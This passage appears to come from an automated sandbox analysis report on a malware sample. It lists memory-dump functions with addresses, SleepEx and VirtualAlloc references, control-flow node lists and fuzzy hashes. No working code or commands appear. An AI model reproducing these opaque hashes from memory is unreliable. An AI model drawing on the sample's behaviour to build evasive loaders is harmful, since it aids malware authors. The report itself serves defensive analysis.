5c7b86b-5c7b86d 1137->1139 1140 5c7b869 1137->1140 1145 5c7b775-5c7b77e 1138->1145 1146 5c7b76b 1138->1146 1139->1136 1140->1136 1141 5c7b881-5c7b885 1142 5c7b887-5c7b89e 1141->1142 1143 5c7b8d0-5c7b8e0 1141->1143 1142->1143 1151 5c7b8a0-5c7b8aa 1142->1151 1145->1092 1146->1145 1153 5c7b8bd-5c7b8cd 1151->1153 1154 5c7b8ac-5c7b8bb 1151->1154 1154->1153 1158->1141 1159->1141 1160->1141
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2613936092.0000000005C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C70000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_5c70000_3pwbTZtiDu.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: d
                                      • API String ID: 0-2564639436
                                      • Opcode ID: 88e831f602e24d9e5246800bc9df926c15dd35fbf8372dcda4fbfc213c767231
                                      • Instruction ID: ae153ded3498bb2bf8e91fd60e4117a803ca3f2c314a061ba7c6db2f9234b586
                                      • Opcode Fuzzy Hash: 88e831f602e24d9e5246800bc9df926c15dd35fbf8372dcda4fbfc213c767231
                                      • Instruction Fuzzy Hash: F6D1683460060ACFCB14DF28C484A6AB7F2FF88314B55C969D55A9B7A1EB30FD46CB90
                                      Function 05C6D0AA Relevance: 1.6, APIs: 1, Instructions: 84COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1161 5c6d0aa-5c6d152 SleepEx 1164 5c6d154-5c6d15a 1161->1164 1165 5c6d15b-5c6d19f 1161->1165 1164->1165
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2613899696.0000000005C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C60000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_5c60000_3pwbTZtiDu.jbxd
                                      Similarity
                                      • API ID: Sleep
                                      • String ID:
                                      • API String ID: 3472027048-0
                                      • Opcode ID: ffce9132c9101d214a80023fb4e7209de7c3cbafc8eea677a10f95fe90909d85
                                      • Instruction ID: 4ab56bdf343667292808b6c6fc2d7432147d4bda230c6104c010f7b070148d0c
                                      • Opcode Fuzzy Hash: ffce9132c9101d214a80023fb4e7209de7c3cbafc8eea677a10f95fe90909d85
                                      • Instruction Fuzzy Hash: 3831CAB4D012589FDB10CFA9D984AEEBBF1BF49310F14942AE815B7300D779AA45CFA4
                                      Function 05C6D0B0 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1170 5c6d0b0-5c6d152 SleepEx 1173 5c6d154-5c6d15a 1170->1173 1174 5c6d15b-5c6d19f 1170->1174 1173->1174
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2613899696.0000000005C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C60000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_5c60000_3pwbTZtiDu.jbxd
                                      Similarity
                                      • API ID: Sleep
                                      • String ID:
                                      • API String ID: 3472027048-0
                                      • Opcode ID: 78df2a9ed11eecaee1a3b5fa8a79423e8decd094d57da57037a7d44b73dd0fab
                                      • Instruction ID: 9d1843a21525d0cb0430d7b13c9f253f1766482ba640d74b972cbc7572abebfc
                                      • Opcode Fuzzy Hash: 78df2a9ed11eecaee1a3b5fa8a79423e8decd094d57da57037a7d44b73dd0fab
                                      • Instruction Fuzzy Hash: C331CAB4D012589FCB10CFAAD880ADEFBF5BF49310F10942AE815B7200C779AA45CFA4
                                      Function 05AA1A59 Relevance: 1.3, APIs: 1, Instructions: 96memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • VirtualAlloc.KERNEL32(?,?,?,?), ref: 05AA1AFF
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2613306074.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_5aa0000_3pwbTZtiDu.jbxd
                                      Similarity
                                      • API ID: AllocVirtual
                                      • String ID:
                                      • API String ID: 4275171209-0
                                      • Opcode ID: 680d06c26dce35eb9f5532bda7f4ae1b60a9c755eca1573a92ce78ce0e855a5b
                                      • Instruction ID: 5974f66f0b99059f500bc4474eaa2ade46c0ca4fdece9f66d8d1616631a81d86
                                      • Opcode Fuzzy Hash: 680d06c26dce35eb9f5532bda7f4ae1b60a9c755eca1573a92ce78ce0e855a5b
                                      • Instruction Fuzzy Hash: ED3197B5D05258AFDF14CFA9D880AAEFBB5BF49310F10942AE824B7210D735A945CFA4
                                      Function 05AA1A60 Relevance: 1.3, APIs: 1, Instructions: 94memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • VirtualAlloc.KERNEL32(?,?,?,?), ref: 05AA1AFF
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2613306074.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_5aa0000_3pwbTZtiDu.jbxd
                                      Similarity
                                      • API ID: AllocVirtual
                                      • String ID:
                                      • API String ID: 4275171209-0
                                      • Opcode ID: 57a9683de98f0c55271f72bedb276ebea4c743e34f2ae5d46aa303bc31e1cc18
                                      • Instruction ID: 1ce0b81e944f866c08ed49120c5bb56c22259367979dbd6d3c4c13182343e8c5
                                      • Opcode Fuzzy Hash: 57a9683de98f0c55271f72bedb276ebea4c743e34f2ae5d46aa303bc31e1cc18
                                      • Instruction Fuzzy Hash: 673197B5D05258AFCF14CFA9D880A9EFBB1BF49310F10942AE814B7210D735A945CF94
                                      Function 027B6EF1 Relevance: 1.3, Strings: 1, Instructions: 37COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2592294512.00000000027B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027B0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_27b0000_3pwbTZtiDu.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 8
                                      • API String ID: 0-4194326291
                                      • Opcode ID: a4c38c9ce1b7392b82fa5aef8978469fc0b7f2d9c8cb51ba54df630a4d4527af
                                      • Instruction ID: f18ecace11f73e7c6c18c6ebeb38a08c92a925fb55684d78ccb417a7d4007d9c
                                      • Opcode Fuzzy Hash: a4c38c9ce1b7392b82fa5aef8978469fc0b7f2d9c8cb51ba54df630a4d4527af
                                      • Instruction Fuzzy Hash: 441105B0C4122ACFDBA1CF64D8487D8B7B4AF08304F0045E59A09B3691DB744E89CF15
                                      Function 05F814ED Relevance: 1.3, Strings: 1, Instructions: 22COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2614360770.0000000005F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F80000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_5f80000_3pwbTZtiDu.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: W
                                      • API String ID: 0-655174618
                                      • Opcode ID: c6cd7ea692867c1069e124882a275dfebe39dd6e5f8648da065d1d921c9ea56f
                                      • Instruction ID: 45db86f4da48d8232b3d42bbc20c019907c332ab54c0488d9e438b2dd775ee7d
                                      • Opcode Fuzzy Hash: c6cd7ea692867c1069e124882a275dfebe39dd6e5f8648da065d1d921c9ea56f
                                      • Instruction Fuzzy Hash: 0DF05874A00119CFDBA0EF18C88CBAE77F9BB86314F5044E5D059A3640DB785EC98F06
                                      Function 05B9B62E Relevance: 1.3, Strings: 1, Instructions: 18COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2613601513.0000000005B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B90000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_5b90000_3pwbTZtiDu.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 8
                                      • API String ID: 0-4194326291
                                      • Opcode ID: c581ed6de6adc3ef19ce04b540e9e80ac1540c68bc85b94e970a0842b8abbb9e
                                      • Instruction ID: 3f78e3875d0b95729554d9c6648c84375841788ac37231081b08a174aab499bf
                                      • Opcode Fuzzy Hash: c581ed6de6adc3ef19ce04b540e9e80ac1540c68bc85b94e970a0842b8abbb9e
                                      • Instruction Fuzzy Hash: 15F00774D422288FDBA4DF24D954799B7B2BB88210F5186D9E80DA3350DF311EA5DF44
                                      Function 05B922C0 Relevance: 1.3, Strings: 1, Instructions: 10COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2613601513.0000000005B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B90000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_5b90000_3pwbTZtiDu.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: z
                                      • API String ID: 0-1657960367
                                      • Opcode ID: 7e4acae133ccd248074c7ddac1803d7a6a1e4f7d0b29e2d1ae5f9338ba321da0
                                      • Instruction ID: 443ab854ef4ea6696a6152a7b67fb952c8b357bb4dadac7322e98d6d87f5b62f
                                      • Opcode Fuzzy Hash: 7e4acae133ccd248074c7ddac1803d7a6a1e4f7d0b29e2d1ae5f9338ba321da0
                                      • Instruction Fuzzy Hash: 76D06C74A142289FDBA9DB54D888A8DB7B9AB46204F1052D9A988A3214DB346E818F46
                                      Function 05C7E9C0 Relevance: .7, Instructions: 677COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2613936092.0000000005C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C70000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_5c70000_3pwbTZtiDu.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 4481493058db7d4c8c36a27c9be008ca6b220a015dab1a8674fdd8d5bd32680c
                                      • Instruction ID: 4a6c3c4f9aa075606fe4993f91fa632d85828bf3ff990f3a7ac92dd6d7c7c1dc
                                      • Opcode Fuzzy Hash: 4481493058db7d4c8c36a27c9be008ca6b220a015dab1a8674fdd8d5bd32680c
                                      • Instruction Fuzzy Hash: D6522D75A002289FDB24DF69C981BEDBBF6BF88310F1584D9E509A7351DA309E81CF61
                                      Function 05AC1EA8 Relevance: .6, Instructions: 577COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2613344942.0000000005AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_5ac0000_3pwbTZtiDu.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: a398525628d8ff0b9ea7fda1452537a15f08bd37ab6c6281bedcfdae195d653f
                                      • Instruction ID: 0036ea8497693c43acd641f4321d20d47b476bbce0bf997978b70303970a8f62
                                      • Opcode Fuzzy Hash: a398525628d8ff0b9ea7fda1452537a15f08bd37ab6c6281bedcfdae195d653f
                                      • Instruction Fuzzy Hash: 3142B278E04209DFDF14EBA5D498ABEBBB2FF48311F508099D9626B250DB349D42CF61
                                      Function 05C78F0F Relevance: .5, Instructions: 535COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2613936092.0000000005C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C70000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_5c70000_3pwbTZtiDu.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: e8c732055dfa57bc3f99420aab8561d625e62b4a7ec3e33ae8b5df1d1ddfd22a
                                      • Instruction ID: d5815e4fabafd53dead71af3255f6e413b3ce8a4b46d985e381d20296edca86a
                                      • Opcode Fuzzy Hash: e8c732055dfa57bc3f99420aab8561d625e62b4a7ec3e33ae8b5df1d1ddfd22a
                                      • Instruction Fuzzy Hash: 9C227F35B002099FDB04DFA9D494AADBBF2FF88310F158469E906AB3A5DB71DD41CB90
                                      Function 05C78348 Relevance: .5, Instructions: 516COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2613936092.0000000005C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C70000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_5c70000_3pwbTZtiDu.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f2fbd8ff0f37720153f3c95f2e339d5d61c0f35c0543cd60dae1d5699f8b891a
                                      • Instruction ID: 39396de1993eef2a138d04d55a7f9f4c1744806b9796dc6f83ea3b4d2338673d
                                      • Opcode Fuzzy Hash: f2fbd8ff0f37720153f3c95f2e339d5d61c0f35c0543cd60dae1d5699f8b891a
                                      • Instruction Fuzzy Hash: 2B227D30E0151D8FCB15DFA5D898AEDBBB2FF48310F148955E912A7298DB349A42CFA0
                                      Function 05AC2EB8 Relevance: .5, Instructions: 488COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2613344942.0000000005AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_5ac0000_3pwbTZtiDu.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: e028be03a6ad1e15ac041f14a1a72218c16111ab07f33367fa6d6448b83cdd17
                                      • Instruction ID: f93d485adb9507441f0d4c4ccb9fb454b79950aaab966d3ffe53c074730a3f93
                                      • Opcode Fuzzy Hash: e028be03a6ad1e15ac041f14a1a72218c16111ab07f33367fa6d6448b83cdd17
                                      • Instruction Fuzzy Hash: 0C32C034E11218CFCF24EFE4D594AACBBB2BF49312F6084AAD416AB254DB385E45CF51
                                      Function 05C7BE30 Relevance: .5, Instructions: 476COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2613936092.0000000005C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C70000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_5c70000_3pwbTZtiDu.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: cfb5c96587b7f528dc308b6b6dc9ac0fc412d32b43e77396c320ac3cf25126ff
                                      • Instruction ID: 3fa3d8dfcb41525361751418c89be32229230e08880d60055bc36c704fd1712e
                                      • Opcode Fuzzy Hash: cfb5c96587b7f528dc308b6b6dc9ac0fc412d32b43e77396c320ac3cf25126ff
                                      • Instruction Fuzzy Hash: F3124D31A002099FDB24DFA5D494AAEBBF2FF88310F24896DD506AB750DB35ED46CB50
                                      Function 05C7DAE8 Relevance: .4, Instructions: 370COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2613936092.0000000005C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C70000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_5c70000_3pwbTZtiDu.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 40442eba3cd4ca4578484d943187c9312ccb638e6985e5b38ee14774b2007f3d
                                      • Instruction ID: 06ff6acbc4ac7fde096c7bd3440c8065f8df30c9c81f7fff9d4603462ca62450
                                      • Opcode Fuzzy Hash: 40442eba3cd4ca4578484d943187c9312ccb638e6985e5b38ee14774b2007f3d
                                      • Instruction Fuzzy Hash: D3F1CB34B10218DFDB04EFA4D998A9DBBB2FF89310F518559E406AB3A5DB71EC42CB50
                                      Function 05C74AA8 Relevance: .3, Instructions: 263COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2613936092.0000000005C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C70000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_5c70000_3pwbTZtiDu.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 89e9c4cbef911f71cec951a4e49eec9dc810aa45dd462392cacfd969d2234ba8
                                      • Instruction ID: eb7727fe0690687acf117fd1fbcd6401215c49f6536a8394ad7a2db0c67b0047
                                      • Opcode Fuzzy Hash: 89e9c4cbef911f71cec951a4e49eec9dc810aa45dd462392cacfd969d2234ba8
                                      • Instruction Fuzzy Hash: 07A19D35B016189FCB09DFA9D485AADBBF2FF88311F148469E91297790CB35DE42CB60
                                      Function 05C79690 Relevance: .2, Instructions: 238COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2613936092.0000000005C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C70000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_5c70000_3pwbTZtiDu.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 257bfdaeb1cb08e9090265ca35b486183d6d6c420881d6b7d8082b27faab26de
                                      • Instruction ID: 7527951e04b914459e128d5ed48e4b5711839897a23661d7f2d0b3ed7a9884ec
                                      • Opcode Fuzzy Hash: 257bfdaeb1cb08e9090265ca35b486183d6d6c420881d6b7d8082b27faab26de
                                      • Instruction Fuzzy Hash: A1910234B001088FDB14EF69C494A6A7BF6BF89310F1085A9E506DF3A4DB71ED41CBA1
                                      Function 05AC26A8 Relevance: .2, Instructions: 231COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2613344942.0000000005AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_5ac0000_3pwbTZtiDu.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 1f4ce8430b337b78f4e38ac4877b5ce59d67196f6f4b5ca965c002f659133c03
                                      • Instruction ID: deb1ef2b83d87b9650c90832e0ca0be6b7e13cc9524ad158d1998f881208cb59
                                      • Opcode Fuzzy Hash: 1f4ce8430b337b78f4e38ac4877b5ce59d67196f6f4b5ca965c002f659133c03
                                      • Instruction Fuzzy Hash: 83A1B178E01209DFCF18EFA5D498AADBBB2FF89311F508069E85667354CB345982CF61
                                      Function 05C7DAD8 Relevance: .2, Instructions: 225COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2613936092.0000000005C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C70000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_5c70000_3pwbTZtiDu.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b981680d8c602afdce683f8decbe6fec2f608df77511510840c4a39a252334b7
                                      • Instruction ID: 196c4340b88839cd06b82b8dc026a5726c8b77546b99bf0ef862d9ff73cd11df
                                      • Opcode Fuzzy Hash: b981680d8c602afdce683f8decbe6fec2f608df77511510840c4a39a252334b7
                                      • Instruction Fuzzy Hash: 2BA1E934A10218DFCB04EFA4D898A9DBBB6FF88310F558559E406AB365DF70AC46CB90
                                      Function 027B5396 Relevance: .2, Instructions: 222COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2592294512.00000000027B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027B0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_27b0000_3pwbTZtiDu.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: d12d85c40f501c37ad66439ac5e0487525389c3f3b11476081305ab1011c9f6a
                                      • Instruction ID: 7296de7b98b94eaa8f3419aac0b6357ea9fc915f2b633014a4b5bc9ec23b2396
                                      • Opcode Fuzzy Hash: d12d85c40f501c37ad66439ac5e0487525389c3f3b11476081305ab1011c9f6a
                                      • Instruction Fuzzy Hash: 28C1BFB4D45228CFDB659F24D8887DDBBB1BF49305F8058E9D60AA3281DB741AC8CF49
                                      Function 05C7A3F0 Relevance: .2, Instructions: 208COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2613936092.0000000005C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C70000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_5c70000_3pwbTZtiDu.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 3a0f0c9aa67261d558facdc5979b66480830629cc4fad34f88085dc3cbdafa96
                                      • Instruction ID: 87664f847acb2deda4e726d266321c079e55291a90701441c560731d0d26c7f2
                                      • Opcode Fuzzy Hash: 3a0f0c9aa67261d558facdc5979b66480830629cc4fad34f88085dc3cbdafa96
                                      • Instruction Fuzzy Hash: 7D81F735A00618CFCB14DF69C89499EBBF6FF88710B1585A9E8169B760DB31ED42CF90
                                      Function 05C77961 Relevance: .2, Instructions: 177COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2613936092.0000000005C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C70000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_5c70000_3pwbTZtiDu.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 0f3c81d6a4746f6c29570ee5a2f5c5cfda244ca15b67fb49377cbee9213c7976
                                      • Instruction ID: 7be85afcdc4fed6c3547e4891f13b278253ce16add80c3591a87e9a2b21d4eee
                                      • Opcode Fuzzy Hash: 0f3c81d6a4746f6c29570ee5a2f5c5cfda244ca15b67fb49377cbee9213c7976
                                      • Instruction Fuzzy Hash: E9518D357006098FDB19AF74C454A2EBBE3FF85221B64886DD9069B7A0DE35DD02CBA1
                                      Function 05F9BC08 Relevance: .2, Instructions: 173COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2614360770.0000000005F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F80000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_5f80000_3pwbTZtiDu.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: adbe51173def4050b9619fce87d1958f83c8fd93ba4f59b838605b3c0c9993f2
                                      • Instruction ID: a22f62ef4612e54056d451000e692bcd9d634ed825ef371b0ac24a75e69d18c2
                                      • Opcode Fuzzy Hash: adbe51173def4050b9619fce87d1958f83c8fd93ba4f59b838605b3c0c9993f2
                                      • Instruction Fuzzy Hash: 2271E674E08608DFDF18EF98E488AEDBBB6FF89304F10412AE415AB254DB385985CF55
                                      Function 05C75610 Relevance: .2, Instructions: 158COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2613936092.0000000005C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C70000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_5c70000_3pwbTZtiDu.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f8dceb608665f9b53fec3d085ec07fba3c6314781b52eef6339fb4cb43db89bd
                                      • Instruction ID: 63760032aab84050a5d849fee2a80fa5274d8e8b0fb6dc440228a366e8dbdd3c
                                      • Opcode Fuzzy Hash: f8dceb608665f9b53fec3d085ec07fba3c6314781b52eef6339fb4cb43db89bd
                                      • Instruction Fuzzy Hash: F2519D357001148FCB15DF69D894AAEBBE2FF89350F1581A9E906DB365DB31ED018BA0
                                      Function 05C74730 Relevance: .2, Instructions: 156COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2613936092.0000000005C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C70000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_5c70000_3pwbTZtiDu.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f02781a6a84ebe1c09216cb25412e67ffcb65c5a6d6e23476174e870ea6543f9
                                      • Instruction ID: 823adda7584a0b99dd47e0b880b38c4622777a22e06bea091ff9cae73d0282c0
                                      • Opcode Fuzzy Hash: f02781a6a84ebe1c09216cb25412e67ffcb65c5a6d6e23476174e870ea6543f9
                                      • Instruction Fuzzy Hash: 1351D431A0051A8FCB04DF68C484A6AFBB1FF86320F558695E519EB751D730ED52CBD0
                                      Function 05C73778 Relevance: .1, Instructions: 149COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2613936092.0000000005C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C70000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_5c70000_3pwbTZtiDu.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 9437ff28c7e5f4076a7e2bf5803a37888c61bb32363b5ecc91495e73a2d5d254
                                      • Instruction ID: ca64f4539c86aa7ebe23c2cb462c8b2885ae863236963178d65bfb1b6e979e7b
                                      • Opcode Fuzzy Hash: 9437ff28c7e5f4076a7e2bf5803a37888c61bb32363b5ecc91495e73a2d5d254
                                      • Instruction Fuzzy Hash: 1B511D76600104AFCB459FA8D904D69BFB7FF8D31471A84D8E2099B376DA32DC21EB51
                                      Function 05C79F20 Relevance: .1, Instructions: 149COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2613936092.0000000005C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C70000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_5c70000_3pwbTZtiDu.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: ac40b3a5041df3a34c3721247284e572fe2af3dc00d8c2407327a88fd451e1f5
                                      • Instruction ID: 3feda183e34bea7b689683e8871b202676b0acddf3655e06d304366a80538557
                                      • Opcode Fuzzy Hash: ac40b3a5041df3a34c3721247284e572fe2af3dc00d8c2407327a88fd451e1f5
                                      • Instruction Fuzzy Hash: F951B4353002098FDB18AF65D854BAE7BA6FF88711F118469E806CB7A0CF34DD52CBA1
                                      Function 05C7D6B8 Relevance: .1, Instructions: 143COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2613936092.0000000005C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C70000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_5c70000_3pwbTZtiDu.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 200d37178367e587683907727361153e98a470baddf00b29378fda7176c6579b
                                      • Instruction ID: e647c6e37e89f0ae64cc71661da86bde10e8dd2feb7abfa1f18aa5abed0d0afd
                                      • Opcode Fuzzy Hash: 200d37178367e587683907727361153e98a470baddf00b29378fda7176c6579b
                                      • Instruction Fuzzy Hash: 6F517C34B106099FCB04EF64E498AADBBBAFF88711F008519F5039B3A4DF709906CB91
                                      Function 05C7417F Relevance: .1, Instructions: 139COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2613936092.0000000005C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C70000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_5c70000_3pwbTZtiDu.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: cb497ebd552efb6ca5fb217b564740baac95c11c46465a94abdfc2cda30b083c
                                      • Instruction ID: 15bb3296f10c65622ce8da94a3e5ecd120e7b1bbed8fe7d4d773d9891b722ba9
                                      • Opcode Fuzzy Hash: cb497ebd552efb6ca5fb217b564740baac95c11c46465a94abdfc2cda30b083c
                                      • Instruction Fuzzy Hash: 7851F431200B058FE728DF7AC48075ABBE2FF84310F10CA6DD05A8BAA4EB34D805CB91
                                      Function 05B974B0 Relevance: .1, Instructions: 114COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2613601513.0000000005B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B90000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_5b90000_3pwbTZtiDu.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f0784e876af1466f58da784d606488e18d8c2037bed184f050bd4d889e787808
                                      • Instruction ID: 695d3d81639500208ef5da3a26aab6bed6816500a7160e1063b2ed56825a9396
                                      • Opcode Fuzzy Hash: f0784e876af1466f58da784d606488e18d8c2037bed184f050bd4d889e787808
                                      • Instruction Fuzzy Hash: DF519170D11248DFDB68DFA9D954AADBBF2FF89300F20856AD405AB360DB316945CF50
